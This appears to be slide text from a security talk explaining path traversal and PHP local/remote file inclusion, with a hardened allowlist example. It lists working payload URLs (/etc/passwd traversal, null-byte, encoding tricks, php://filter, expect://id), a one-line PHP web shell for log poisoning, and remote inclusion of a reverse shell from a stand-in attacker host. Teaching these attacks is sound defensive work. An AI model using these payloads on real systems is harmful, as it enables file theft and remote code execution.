Path traversal (directory traversal)
Igor Tarpan
Armed Forces of the Republic of Moldova
Networking
Server management
Security
Starlab
Information security engineer
Endava
Cyber security analyst
cmd.exe C:\Program Files\Amego Browser\Amego.exe
cmd.exe Amego Browser\Amego.exe
Current location
C:\Program Files\
Current location
C:\Program Files\VLC Player\
cmd.exe ..\Amego Browser\Amego.exe
cat /var/www/html/index.html
cat html/index.html
Current location
/var/www/
Current location
/var/logs/nginx/
cat ../../www/html/index.html
(Local file inclusion)
Local File Inclusion is the process of including files that are already present on the server by exploiting vulnerable inclusion procedures implemented in the application.
<h1>Hello Secure Talks</h1>
<?php
// Vulnerable: the request parameter is passed to include unchecked.
include $_GET['page'];
?>
http://pwnme.com/index.php?page=articles.php
http://pwnme.com/?page=articles.php
=
index.php
<h1>Hello Secure Talks</h1>
<?php
include $_GET['page']; // here $_GET['page'] is 'articles.php'
?>
index.php
<h1>Hello Secure Talks</h1>
<?php
include $_GET['page']; // here $_GET['page'] is './articles.php'
?>
index.php
<h1>Hello Secure Talks</h1>
<?php
include $_GET['page']; // here $_GET['page'] is '../../../etc/passwd'
?>
=
http://pwnme.com/index.php?page=../../../etc/passwd
index.php
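<h1>Hello Secure Talks</h1>
<?php
// Vulnerable: a fixed ".php" suffix is appended to the unchecked parameter.
include $_GET['page'] . ".php"; // here $_GET['page'] is 'articles'
?>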
http://pwnme.com/index.php?page=articles
http://pwnme.com/index.php?page=articles.php
./articles.php.php
../../../etc/passwd.php
../../etc/mysql/my.cnf.php
Null byte injection
PHP <= v.5.3.
http://pwnme.com/index.php?page=../../etc/passwd%00
index.php
<h1>Hello Secure Talks</h1>
<?php
include $_GET['page'] . ".php"; // here $_GET['page'] is '../../etc/passwd%00'
?>
Path truncation
PHP <= v.5.3.
http://pwnme.com/index.php?page=../../etc/passwd////...//////
index.php
<h1>Hello Secure Talks</h1>
<?php
include $_GET['page'] . ".php"; // here $_GET['page'] is '../../etc/passwd//////... /////'
?>
http://pwnme.com/index.php?page=../../././././././etc/passwd
http://pwnme.com/index.php?page=%2e%2e%2fetc%2fpasswd
index.php
http://pwnme.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://pwnme.com/index.php?page=....//....//etc/passwd
http://pwnme.com/index.php?page=..///////..////..//////etc/passwd
http://pwnme.com/index.php?page=php://filter/read=string.rot13/resource=/etc/passwd
http://pwnme.com/index.php?page=expect://id
http://pwnme.com/index.php?page=expect://ls
http://pwnme.com/index.php?page=php://filter/convert.iconv.utf-8.utf-16/resource=/etc/passwd
http://pwnme.com/index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd
...
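A hardened counterpart to the include $_GET['page'] pattern shown above, as an added example that is not part of the original slides: the request value is matched against a fixed allowlist and the resolved path is confirmed to sit inside the pages directory. The function name resolve_page, the allowlist entries and the temporary demo directory are assumptions made for illustration.

```php
<?php
// Added example (not from the slides): resolve ?page= through an allowlist
// instead of handing it to include. Page names below are assumptions.
const ALLOWED_PAGES = ['articles', 'contact'];

function resolve_page(string $requested, string $pagesDir): ?string
{
    // 1. Exact match only: rejects ../ sequences, encoded dots, NUL bytes,
    //    repeated slashes and scheme prefixes such as php:// or http://.
    if (!in_array($requested, ALLOWED_PAGES, true)) {
        return null;
    }
    // 2. Defense in depth: canonicalise and confirm containment in $pagesDir.
    $base = realpath($pagesDir);
    $path = realpath($pagesDir . '/' . $requested . '.php');
    if ($base === false || $path === false) {
        return null; // directory or page file does not exist
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null; // resolved outside the pages directory (e.g. via symlink)
    }
    return $path;
}

// Constructed demo setup: a temporary pages directory with one allowed page.
$pagesDir = sys_get_temp_dir() . '/lfi_demo_pages';
if (!is_dir($pagesDir)) {
    mkdir($pagesDir, 0700, true);
}
file_put_contents($pagesDir . '/articles.php', "<p>Articles</p>\n");

// Constructed inputs, taken from the request values shown on the slides.
$samples = [
    'articles',
    'articles.php',
    '../../../etc/passwd',
    "../../etc/passwd\0",
    '....//....//etc/passwd',
    '%2e%2e%2fetc%2fpasswd',
    'php://filter/convert.base64-encode/resource=/etc/passwd',
    'http://attacker.md/reverse-shell.php',
];
foreach ($samples as $value) {
    $resolved = resolve_page($value, $pagesDir);
    printf("%-58s => %s\n", addcslashes($value, "\0"), $resolved ?? 'rejected');
}
// In index.php: $p = resolve_page($_GET['page'] ?? 'articles', $pagesDir);
// then include $p only when it is not null, otherwise answer with a 404.
```

Only the first sample resolves to a file; every other value is rejected before any filesystem call. Keeping allow_url_include set to Off in php.ini (its default) additionally blocks http:// includes.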
poisoning
<?php echo system($_GET["cmd"]); ?>
http://pwnme.com/index.php?page=../../../poisoned_file.txt?cmd=whoami
root
http://pwnme.com/
file upload
http://pwnme.com/index.php?page=../upload/shell.php
shell.jpg.php
www/upload/
(remote file inclusion)
http://pwnme.com/index.php?page=http://attacker.md/reverse-shell.php
reverse-shell.php
http://attacker.md/
http://pwnme.com/
php.ini
| Local File Inclusion | Path traversal |
|---|---|
| File execution (php) | File reading |
| File reading | |
<h1>Hello Secure Talks</h1>
<?php
echo "Hack the planet !";
?>
Hello Secure Talks
Hack the planet !